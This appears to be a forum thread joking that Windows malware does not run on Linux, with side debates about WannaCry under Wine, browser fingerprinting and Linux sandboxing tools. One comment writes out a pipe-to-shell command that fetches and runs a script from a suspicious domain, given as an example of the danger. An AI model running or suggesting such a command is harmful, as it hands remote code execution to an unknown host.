• kamen
    link
    English
    107
    edit-2
    5 hours ago

    … and yet some of the same people will readily copy-paste random shell scripts into their terminal without fully understanding them.

      • @PieMePlenty
        link
        23 hours ago

        In fact, you should delete the terminal altogether. On a related note, powershell access is considered taboo in corporate environments by IT departments. When security audits are done, you lose a point if powershell can be used. It is in fact considered a hacking tool.

    • Possibly linux
      link
      fedilink
      English
      28
      edit-2
      11 hours ago
      curl gu5usgugiv.lol | bash || curl get.k3s.io | bash
      

      Someone did something similar to this with a fake brew package manager page. They paid Google to put it on the front page.

    • @Huschke
      link
      7413 hours ago

      But a forum post said it would fix my issue.

      • @[email protected]
        link
        fedilink
        2913 hours ago

        I feel like there’s some truth to this!

        If the posted answer was in a moderately active thread, you can generally assume it’s correct if there are no contradictory replies.

        • @lemming741
          link
          English
          2613 hours ago

          If the thread has been dead a few weeks, they could edit their post. Or if it pulls a objects, those objects could change.

    • @Rooty
      link
      4413 hours ago

      Raises hand I might be some people 🥺

    • @DragonsInARoom
      link
      812 hours ago

      Let me open up my Linux bible and see if its malicious

  • @HStone32
    link
    69 hours ago

    The virgin bin vs the chad .exe

  • @apex32
    link
    4515 hours ago

    A friend of mine once downloaded something malicious to his Linux machine and wasn’t worried about it. Then some time later, while browsing his files from a Windows machine, saw it and was like, “hey, what’s this?” Oops.

    He’s a tech savvy guy, so I’m guessing the fact he had downloaded it himself really let his guard down.

    • @betterdeadthanreddit
      link
      English
      4914 hours ago

      That’s why you don’t store your stool samples in the same fridge as your chocolate pudding. Malware goes into the vault.

      • @[email protected]
        link
        fedilink
        English
        2113 hours ago

        WannaCry is believed to use the EternalBlue exploit, which was developed by the U.S. National Security Agency (NSA)to attack computers running Microsoft Windows operating systems.

        Hehe

      • @[email protected]
        link
        fedilink
        14
        edit-2
        13 hours ago

        now im really tempted to try it, we have a decryptor now dont we?

        inb4 decryptor: borked

        • @[email protected]
          link
          fedilink
          24
          edit-2
          13 hours ago

          What works

          Encryption - Yes

          GUI - Yes

          What does not

          SMB & Network replication does not always work, may require SMB network patch.

          See: Misc Things to configure (Samba Shares)

          Some Font rendering issues.

          What was not tested

          Decryption

          Ransom Payment

          Uh oh. And giving it “platinum” even though some stuff doesn’t work and basic features weren’t tested is bullshit. I demand a retraction!

        • macniel
          link
          fedilink
          2114 hours ago

          Why? You don’t wanna know how well WannaCry runs via Wine? The site is perfectly harmless.

        • @[email protected]
          link
          fedilink
          English
          11
          edit-2
          14 hours ago

          It’s just an entry in Wine’s AppDB, where they keep track of how well apps run on wine. Like ProtonDB, but for general applications.

          • @[email protected]
            link
            fedilink
            -614 hours ago

            Whole bunch of people trying to get me to click this sus link…

            You’re never gonna do it.

            I cast Millennial Paranoia, BOOMERS.

            GO BACK TO YOUR CHAIN EMAILS

        • @[email protected]
          link
          fedilink
          6
          edit-2
          14 hours ago

          It’s just to WineHQ’s AppDb, it just describes how well stuff works with Wine. It’s similar to the newer ProtonDB. Someone tested the WannaCry/WannaCrypt malware with Wine for the hell of it.

  • @Lime66
    link
    7117 hours ago

    Wine automatically running:

  • @daggermoon
    link
    3516 hours ago

    It does if you right click it and run with wine or whatever it says

        • @[email protected]
          link
          fedilink
          24 hours ago

          my problem was i couldn’t find where it is and search engines couldn’t provide an answer, but just now i learned you can find out where something is installed with

          whereis appname
          
  • @lath
    link
    4218 hours ago

    Modern viruses check the os before deciding which type of file to send your way.

    • @LordKitsuna
      link
      5017 hours ago

      This is why you use a user agent switcher to lie about being windows. It’s a form of anti malware!

      • N.E.P.T.R
        link
        fedilink
        English
        -1916 hours ago

        Except websites can tell what base OS you run using browser fingerprinting. It os impossible to lie aboit your OS because of the differences in platforms.

        • @LordKitsuna
          link
          48 hours ago

          Sure, if they put in the effort. Most don’t even when Distributing malware

          • N.E.P.T.R
            link
            fedilink
            English
            -25 hours ago

            That isnt a great defense against malware “imho”. Security through assuming the threat actor is lazy is just not security. It doesnt take like any effort on their part to just use some off-the-shelf OS fingerprinting code. It isnt worth it either because it contributes to your overall fingerprint, since normal RFP users have a standardized useragent for Windows and Linux separately.

              • N.E.P.T.R
                link
                fedilink
                English
                -13 hours ago

                It really isnt any defense. All a website can do is initiate a download, websites are sandboxed by default. You still have to run the executable, which doesnt really apply to Linux because the file will have no executable permission.

            • @LordKitsuna
              link
              24 hours ago

              Security is layers, i utilize apparmor and firejail personally. And in fact 90% of widespread malware specifically relies on lazy people. Often targets default passwords etc

              • N.E.P.T.R
                link
                fedilink
                English
                13 hours ago

                Firejail is a large SETUID binary which can (and has) aid in privilege escalation. It is recommended to avoid it for this reason.

                See: https://madaidans-insecurities.github.io/linux.html#firejail

                If you are relying on community sandboxing profiles and not making your own, i can understand why Firejail is interesting as a choice because of its large community.

                If you are making your own, consider checking out Bubblewrap (available on most Linux systems), Bubblejail), Crablock, and Sydbox, which all use unprivileged sandboxes.

        • RachelRodent
          link
          fedilink
          26
          edit-2
          13 hours ago

          You can lie about your fingerprint very much in fact it is the default on librewolf

          • N.E.P.T.R
            link
            fedilink
            English
            011 hours ago

            You can lie, but that doesnt mean that a website cant still tell your base OS if they use JS platform fingerprinting. Arkenfox, the base config which Librewolf is based off of says the exact same thing. Go to CreepJS and see it get your platform regardless.

              • N.E.P.T.R
                link
                fedilink
                English
                -16 hours ago

                Firstly there is no need to be condescending.

                Secondly, do you block all JS? NoScript is not a silver bullet and doesnt stop fingerprinting, it is itself identified by the CreepJS test site. It may in this case reduce the chance of OS fingerprinting, but pure CSS methods exist as well.

                Additionally, NoScript is laregly redundant with uBlock Origin since you can do everything that it offers, such as blocking 3rd party scripts/iframes/all, block fonts, block JS, and it is very granular.

                Bottom line, you are fingerpintable.

        • @[email protected]
          link
          fedilink
          English
          513 hours ago

          Generally browser fingerprinting is used to identify individual browser sessions across IP addresses. This mostly takes into account reported features and capabilities of the browser and OS to the website. Fingerprinting isn’t looking for specific info your browser reports, it’s taking it all and hashing it to get a unique id specific to the browser. Because it’s hashed, it can’t be reversed to identify the OS from the hash.

          Sure a malicious website could Ignore the user agent and probe for some hardware capabilities that are specific to Linux, but that would be a lot of effort to probe various things which are set differently across all different browsers. I can’t speak for bad actors, but I wouldn’t spend the effort to check if the user agent is spoofed, if 95% of the time it’s accurate to get the OS type.

          • N.E.P.T.R
            link
            fedilink
            English
            -1
            edit-2
            10 hours ago

            It is trivial to identify OS platform because browser work differently on each platform. Wjat Librewolf does with useragent on Linux actually is makes users stand out more because it isn’t what privacy.resistFingerprinting (RFP) reports on normally.

            Hackers (like the comment scenario i was responding to) are substantially more likely to employ platform fingerprint than trust a fale useragent. And loads general websites employ fingerprinting, meaning deviation from default RFP behaviour makes you stand out (more than you already do by using RFP since it is a small pool already).

            • @[email protected]
              link
              fedilink
              English
              15 hours ago

              Agreed, I’m not saying it’s impossible to detect the OS, but it’s even more trivial for an adversary to regex the User Agent and serve the malware for that OS. The average user doesn’t even know what a User Agent is, and that’s who the drive by malware websites are counting on to infect because they’re easy targets.

              Just like a real fingerprint, that will only identify the fingerprint to a person, not tell you that the fingerprint is from someone who is European. Fingerprints are used to track you across different websites, and build a profile of you for advertising.

              • N.E.P.T.R
                link
                fedilink
                English
                -15 hours ago

                Yeah okay.

                My logic was that it is much more likely that someone will spoof there useragent already if they are on Linux. If threat actor is targeting not just Windows but also Linux, they probably would understand the very real likelyhood of platform spoofing.

        • @uid0gid0
          link
          413 hours ago

          Twitch.TV will tell you that you need to use a supported browser if you connect with Linux in your user agent no matter what browser you use. Changing Linux to Windows in your agent with no other changes resolves this issue.

    • @[email protected]
      link
      fedilink
      10
      edit-2
      14 hours ago

      Do you have any data to back up that claim? I don’t think that’s true at all, it would be very rare.

      • @lath
        link
        4
        edit-2
        12 hours ago

        Do you have any data to back up that claim?

        None whatsoever.

        I don’t think that’s true at all, it would be very rare.

        Suspicious words. You have one, don’t you? Don’t worry, I won’t tell.

        • @[email protected]
          link
          fedilink
          412 hours ago

          Why suspicious? I have genuinely never read a news story about a virus sending different versions of itself to different OSs. I’m sure it happens, but it doesn’t seem common at all, and you are claiming it very matter-of-factly so I am interested to know more.

          • @lath
            link
            08 hours ago

            If you haven’t come across them yet, then i might be a pioneer! Dibs on the patent!

            But your words confuse me. Either it’s not true at all or it happens. You’re sure they exist, though rare. As i said before, suspicious. You might just be one of those rare occurrences after all…

            You wish to be the first acknowledged one, no? It’s alright, you can have the honour. I’ll keep mum about it for you.

            • @[email protected]
              link
              fedilink
              26 hours ago

              But your words confuse me. Either it’s not true at all or it happens.

              The idea is pretty simple, so it would be surprising if it wasn’t happening at all. But there is a huge difference between “there probably exist some examples that do that” and a sweeping statement about all of them in general.

              • @lath
                link
                05 hours ago

                and a sweeping statement about all of them in general.

                Or, hear me out here, the ones that don’t aren’t modern… Get it? Wink, wink. Nudge, nudge.

  • @9point6
    link
    1117 hours ago

    This has given me a horrendous idea involving a Windows batch file and a weird shebang

    • @x00z
      link
      English
      14 hours ago

      Shebang needs executable rights afaik.

    • lurch (he/him)
      link
      fedilink
      716 hours ago

      you’re not the first. there absolutely are multiplatform launcher scripts. i have used one for installers a few years ago.